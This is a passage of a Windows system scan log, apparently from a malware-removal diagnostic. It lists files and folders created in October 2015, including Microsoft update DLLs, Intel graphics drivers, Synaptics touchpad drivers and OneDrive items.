2015-10-11 15:38 - 2015-09-16 23:27 - 00454512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directmanipulation.dll
2015-10-11 15:38 - 2015-09-16 23:26 - 00434376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2015-10-11 15:38 - 2015-09-16 23:26 - 00428128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2015-10-11 15:38 - 2015-09-16 23:21 - 00658528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2015-10-11 15:38 - 2015-09-16 23:04 - 00910848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2015-10-11 15:38 - 2015-09-16 22:58 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2015-10-11 15:38 - 2015-09-16 22:57 - 00281600 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2015-10-11 15:38 - 2015-09-16 22:56 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2015-10-11 15:38 - 2015-09-16 22:54 - 00780288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2015-10-11 15:38 - 2015-09-16 22:52 - 00591360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2015-10-11 15:38 - 2015-09-16 22:52 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2015-10-11 15:38 - 2015-09-16 22:51 - 01067520 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-10-11 15:38 - 2015-09-16 22:51 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2015-10-11 15:38 - 2015-09-16 22:50 - 00929280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2015-10-11 15:38 - 2015-09-16 22:50 - 00312832 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2015-10-11 15:38 - 2015-09-16 22:48 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2015-10-11 15:38 - 2015-09-16 22:48 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2015-10-11 15:38 - 2015-09-16 22:48 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2015-10-11 15:38 - 2015-09-16 22:47 - 00513536 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2015-10-11 15:38 - 2015-09-16 22:45 - 00869376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2015-10-11 15:38 - 2015-09-16 22:45 - 00627712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2015-10-11 15:38 - 2015-09-16 22:44 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2015-10-11 15:38 - 2015-09-16 22:43 - 00378368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2015-10-11 15:38 - 2015-09-16 22:41 - 00217088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2015-10-11 15:38 - 2015-09-16 22:39 - 00587264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2015-10-11 15:38 - 2015-09-16 22:37 - 00454656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2015-10-11 15:38 - 2015-09-16 22:34 - 00253440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2015-10-11 15:38 - 2015-09-16 22:32 - 00336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2015-10-11 15:38 - 2015-09-16 22:32 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2015-10-11 15:38 - 2015-09-16 22:29 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2015-10-11 15:38 - 2015-09-16 22:29 - 00677888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2015-10-11 15:38 - 2015-09-16 22:29 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2015-10-11 15:38 - 2015-09-16 22:16 - 00512000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2015-10-11 15:38 - 2015-09-12 18:41 - 02639872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2015-10-11 15:37 - 2015-09-16 23:50 - 00099664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2015-10-11 15:37 - 2015-09-16 23:48 - 00584656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2015-10-11 15:37 - 2015-09-16 23:48 - 00516448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-10-11 15:37 - 2015-09-16 23:48 - 00395088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2015-10-11 15:37 - 2015-09-16 23:48 - 00332624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2015-10-11 15:37 - 2015-09-16 23:48 - 00243760 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2015-10-11 15:37 - 2015-09-16 23:26 - 01895568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2015-10-11 15:37 - 2015-09-16 23:26 - 00508248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2015-10-11 15:37 - 2015-09-16 23:09 - 00269312 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2015-10-11 15:37 - 2015-09-16 23:08 - 00494592 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2015-10-11 15:37 - 2015-09-16 23:06 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\system32\CellularAPI.dll
2015-10-11 15:37 - 2015-09-16 23:06 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringservice.dll
2015-10-11 15:37 - 2015-09-16 23:05 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2015-10-11 15:37 - 2015-09-16 22:57 - 00403456 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2015-10-11 15:37 - 2015-09-16 22:57 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2015-10-11 15:37 - 2015-09-16 22:55 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUDFx02000.dll
2015-10-11 15:37 - 2015-09-16 22:55 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2015-10-11 15:37 - 2015-09-16 22:55 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2015-10-11 15:37 - 2015-09-16 22:55 - 00120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2015-10-11 15:37 - 2015-09-16 22:52 - 00465920 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll
2015-10-11 15:37 - 2015-09-16 22:52 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2015-10-11 15:37 - 2015-09-16 22:52 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\SubscriptionMgr.dll
2015-10-11 15:37 - 2015-09-16 22:51 - 01812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2015-10-11 15:37 - 2015-09-16 22:48 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll
2015-10-11 15:37 - 2015-09-16 22:48 - 00273920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2015-10-11 15:37 - 2015-09-16 22:47 - 00371712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2015-10-11 15:37 - 2015-09-16 22:47 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2015-10-11 15:37 - 2015-09-16 22:46 - 00928256 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2015-10-11 15:37 - 2015-09-16 22:46 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2015-10-11 15:37 - 2015-09-16 22:46 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2015-10-11 15:37 - 2015-09-16 22:46 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2015-10-11 15:37 - 2015-09-16 22:46 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2015-10-11 15:37 - 2015-09-16 22:45 - 00832512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2015-10-11 15:37 - 2015-09-16 22:44 - 01844736 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2015-10-11 15:37 - 2015-09-16 22:43 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2015-10-11 15:37 - 2015-09-16 22:32 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2015-10-11 15:37 - 2015-09-16 22:30 - 00311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2015-10-11 15:36 - 2015-09-18 22:14 - 00102304 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmapi.dll
2015-10-11 15:36 - 2015-09-16 23:50 - 00088384 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2015-10-11 15:36 - 2015-09-16 23:49 - 00501008 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2015-10-11 15:36 - 2015-09-16 23:48 - 00406864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2015-10-11 15:36 - 2015-09-16 23:48 - 00278352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2015-10-11 15:36 - 2015-09-16 23:37 - 01168736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-10-11 15:36 - 2015-09-16 23:28 - 00407608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2015-10-11 15:36 - 2015-09-16 23:28 - 00074880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
2015-10-11 15:36 - 2015-09-16 23:08 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Speech.Pal.dll
2015-10-11 15:36 - 2015-09-16 23:08 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerShellext.exe
2015-10-11 15:36 - 2015-09-16 23:04 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2015-10-11 15:36 - 2015-09-16 23:03 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2015-10-11 15:36 - 2015-09-16 23:03 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2015-10-11 15:36 - 2015-09-16 23:03 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2015-10-11 15:36 - 2015-09-16 23:00 - 00446976 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2015-10-11 15:36 - 2015-09-16 23:00 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KeywordDetectorMsftSidAdapter.dll
2015-10-11 15:36 - 2015-09-16 22:55 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwancfg.dll
2015-10-11 15:36 - 2015-09-16 22:52 - 06572032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll
2015-10-11 15:36 - 2015-09-16 22:52 - 01216512 _____ (Microsoft Corporation) C:\WINDOWS\system32\netcenter.dll
2015-10-11 15:36 - 2015-09-16 22:50 - 00421888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2015-10-11 15:36 - 2015-09-16 22:50 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\portcls.sys
2015-10-11 15:36 - 2015-09-16 22:50 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\buttonconverter.sys
2015-10-11 15:36 - 2015-09-16 22:49 - 00439296 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationWebproxy.dll
2015-10-11 15:36 - 2015-09-16 22:49 - 00342016 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationGeofences.dll
2015-10-11 15:36 - 2015-09-16 22:49 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationWiFiAdapter.dll
2015-10-11 15:36 - 2015-09-16 22:49 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Speech.Pal.dll
2015-10-11 15:36 - 2015-09-16 22:46 - 00621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2015-10-11 15:36 - 2015-09-16 22:46 - 00079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\HttpsDataSource.dll
2015-10-11 15:36 - 2015-09-16 22:44 - 00599552 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2015-10-11 15:36 - 2015-09-16 22:44 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\syncutil.dll
2015-10-11 15:36 - 2015-09-16 22:31 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncryptprov.dll
2015-10-11 15:35 - 2015-09-16 23:11 - 00160256 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2015-10-11 15:35 - 2015-09-16 23:10 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2015-10-11 15:35 - 2015-09-16 23:09 - 00143360 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2015-10-11 15:35 - 2015-09-16 23:02 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2015-10-11 15:35 - 2015-09-16 22:55 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2015-10-11 15:35 - 2015-09-16 22:52 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2015-10-11 15:35 - 2015-09-16 22:52 - 00371712 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2015-10-11 15:35 - 2015-09-16 22:51 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2015-10-11 15:35 - 2015-09-16 22:50 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationPeWiFi.dll
2015-10-11 15:35 - 2015-09-16 22:49 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationFramework.dll
2015-10-11 15:35 - 2015-09-16 22:49 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationCrowdsource.dll
2015-10-11 15:35 - 2015-09-16 22:49 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationPeIP.dll
2015-10-11 15:35 - 2015-09-16 22:45 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2015-10-11 15:35 - 2015-09-16 22:43 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2015-10-11 15:35 - 2015-09-16 22:36 - 01171456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netcenter.dll
2015-10-11 15:35 - 2015-09-16 22:28 - 00473088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2015-10-11 15:34 - 2015-09-16 23:03 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2015-10-11 15:34 - 2015-09-16 23:03 - 00154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2015-10-11 15:34 - 2015-09-16 23:02 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2015-10-11 15:34 - 2015-09-16 22:56 - 00317440 _____ (Microsoft Corporation) C:\WINDOWS\system32\configmanager2.dll
2015-10-11 15:34 - 2015-09-16 22:55 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll
2015-10-11 15:34 - 2015-09-16 22:54 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-10-11 15:34 - 2015-09-16 22:50 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationPeCell.dll
2015-10-11 15:34 - 2015-09-16 22:46 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\syncmlhook.dll
2015-10-11 15:34 - 2015-09-16 22:39 - 00247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-10-11 15:30 - 2015-10-11 15:30 - 00000000 ____D C:\Users\christopher lane\AppData\Local\NetworkTiles
2015-10-11 10:31 - 2015-10-11 10:31 - 00030544 _____ (HP) C:\WINDOWS\system32\Drivers\WirelessButtonDriver64.sys
2015-10-11 10:27 - 2015-10-11 10:28 - 00002416 _____ C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2015-10-11 10:27 - 2015-10-11 10:28 - 00000000 ___RD C:\Users\christopher lane\OneDrive
2015-10-11 10:21 - 2015-10-11 10:21 - 00000529 _____ C:\WINDOWS\Synaptics.PD.log
2015-10-11 10:21 - 2015-10-11 10:21 - 00000529 _____ C:\WINDOWS\Synaptics.log
2015-10-11 10:21 - 2015-10-11 10:21 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2015-10-11 10:21 - 2015-10-11 10:21 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01011.Wdf
2015-10-11 10:21 - 2015-10-11 10:21 - 00000000 ____D C:\$SysReset
2015-10-11 10:21 - 2015-10-11 10:19 - 00044192 _____ (Synaptics Incorporated) C:\WINDOWS\system32\Drivers\Smb_driver_Intel.sys
2015-10-11 10:19 - 2015-10-11 10:19 - 01806192 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2015-10-11 10:19 - 2015-10-11 10:19 - 00422048 _____ (Synaptics Incorporated) C:\WINDOWS\SysWOW64\SynCom.dll
2015-10-11 10:19 - 2015-10-11 10:19 - 00267936 _____ (Synaptics Incorporated) C:\WINDOWS\system32\SynTPCo35.dll
2015-10-11 10:19 - 2015-10-11 10:19 - 00231456 _____ C:\WINDOWS\system32\pca-manta.bin
2015-10-11 10:19 - 2015-10-11 10:19 - 00044192 _____ (Synaptics Incorporated) C:\WINDOWS\system32\Drivers\Smb_driver_Intel_Aux.sys
2015-10-11 10:19 - 2015-10-11 10:19 - 00043680 _____ (Synaptics Incorporated) C:\WINDOWS\system32\Drivers\Smb_driver_AMDASF_Aux.sys
2015-10-11 10:19 - 2015-10-11 10:19 - 00000092 _____ C:\WINDOWS\system32\calibration.bin
2015-10-11 10:19 - 2015-10-11 10:19 - 00000000 ____D C:\Users\christopher lane\AppData\Local\MicrosoftEdge
2015-10-11 10:18 - 2015-10-11 10:18 - 00000000 ____D C:\ProgramData\ATI
2015-10-11 02:27 - 2015-10-11 02:01 - 00000000 ___DC C:\WINDOWS\Panther
2015-10-11 02:26 - 2015-10-11 01:32 - 00000000 __SHD C:\Recovery
2015-10-11 02:21 - 2015-10-14 21:25 - 00000000 ____D C:\Windows.old
2015-10-11 02:21 - 2015-10-11 02:21 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2015-10-11 02:18 - 2015-10-11 02:18 - 00000000 ____D C:\WINDOWS\SysWOW64\BestPractices
2015-10-11 02:18 - 2015-10-11 02:18 - 00000000 ____D C:\WINDOWS\system32\msmq
2015-10-11 02:18 - 2015-10-11 02:18 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2015-10-11 02:18 - 2015-10-11 02:18 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-10-11 02:18 - 2015-10-11 02:18 - 00000000 ____D C:\Program Files\MSBuild
2015-10-11 02:18 - 2015-10-11 02:18 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2015-10-11 02:18 - 2015-10-11 02:18 - 00000000 ____D C:\inetpub
2015-10-11 02:18 - 2015-10-11 01:46 - 00000000 ____D C:\Program Files (x86)\MSBuild
2015-10-11 02:18 - 2015-06-17 19:10 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2015-10-11 02:18 - 2015-06-17 19:10 - 00124112 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-10-11 02:18 - 2015-06-17 19:10 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2015-10-11 02:18 - 2015-05-29 22:07 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2015-10-11 02:18 - 2015-05-29 22:07 - 00102608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-10-11 02:18 - 2015-05-29 22:07 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2015-10-11 02:14 - 2015-10-11 02:14 - 00061917 _____ C:\WINDOWS\SysWOW64\CCCInstall_201510110214134937.log
2015-10-11 02:13 - 2015-10-11 02:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-10-11 02:12 - 2015-10-11 02:12 - 00000000 ____D C:\Program Files\ATI Technologies
2015-10-11 02:11 - 2015-10-11 02:11 - 12814752 _____ (Intel Corporation) C:\WINDOWS\system32\igdumd64.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 11223896 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdumd32.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 09016320 _____ (Intel Corporation) C:\WINDOWS\system32\igfxress.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 05384176 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\igdkmd64.sys
2015-10-11 02:11 - 2015-10-11 02:11 - 03520000 _____ (Intel Corporation) C:\WINDOWS\system32\igfxcmjit64.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 03129856 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxcmjit32.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 01981696 _____ C:\WINDOWS\system32\iglhxa64.cpa
2015-10-11 02:11 - 2015-10-11 02:11 - 01067696 _____ (Intel Corporation) C:\WINDOWS\system32\igfxcmrt64.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00957472 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxcmrt32.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00584192 _____ (Intel Corporation) C:\WINDOWS\system32\igfx11cmrt64.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00551424 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfx11cmrt32.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00544552 _____ (Intel Corporation) C:\WINDOWS\system32\iglhsip64.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00539312 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhsip32.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00523184 _____ (Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
2015-10-11 02:11 - 2015-10-11 02:11 - 00453552 _____ (Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
2015-10-11 02:11 - 2015-10-11 02:11 - 00451584 _____ (Intel Corporation) C:\WINDOWS\system32\igfxdev.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00449024 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrell.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00448512 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrfra.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00448512 _____ (Intel Corporation) C:\WINDOWS\system32\igfxresn.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00448000 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrrus.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00448000 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrrom.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00447488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrsky.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00447488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrptg.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00447488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrplk.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00447488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrnld.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00447488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrita.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00447488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrhrv.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00447488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrdeu.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00446976 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrhun.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00446976 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrfin.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00446976 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrcsy.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00446464 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrtrk.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00446464 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrsve.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00446464 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrslv.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00446464 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrptb.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00446464 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrnor.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00445952 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrtha.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00445952 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrdan.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00444416 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrheb.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00444416 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrara.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00440832 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrjpn.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00439808 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrkor.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00437760 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrcht.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00437248 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrchs.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00418816 _____ (Intel Corporation) C:\WINDOWS\system32\igfxTMM.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00393216 _____ (Intel Corporation) C:\WINDOWS\system32\igfxpph.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00339456 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxdv32.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00294912 _____ (Intel Corporation) C:\WINDOWS\system32\igfxrenu.lrc
2015-10-11 02:11 - 2015-10-11 02:11 - 00290224 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\IntelCpHeciSvc.exe
2015-10-11 02:11 - 2015-10-11 02:11 - 00272928 _____ C:\WINDOWS\SysWOW64\igvpkrng600.bin
2015-10-11 02:11 - 2015-10-11 02:11 - 00272928 _____ C:\WINDOWS\system32\igvpkrng600.bin
2015-10-11 02:11 - 2015-10-11 02:11 - 00266152 _____ (Intel Corporation) C:\WINDOWS\system32\igfxext.exe
2015-10-11 02:11 - 2015-10-11 02:11 - 00231312 _____ (Intel Corporation) C:\WINDOWS\system32\iglhcp64.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00194880 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhcp32.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00183216 _____ (Intel Corporation) C:\WINDOWS\system32\igfxtray.exe
2015-10-11 02:11 - 2015-10-11 02:11 - 00151040 _____ (Intel Corporation) C:\WINDOWS\system32\igfxdo.dll
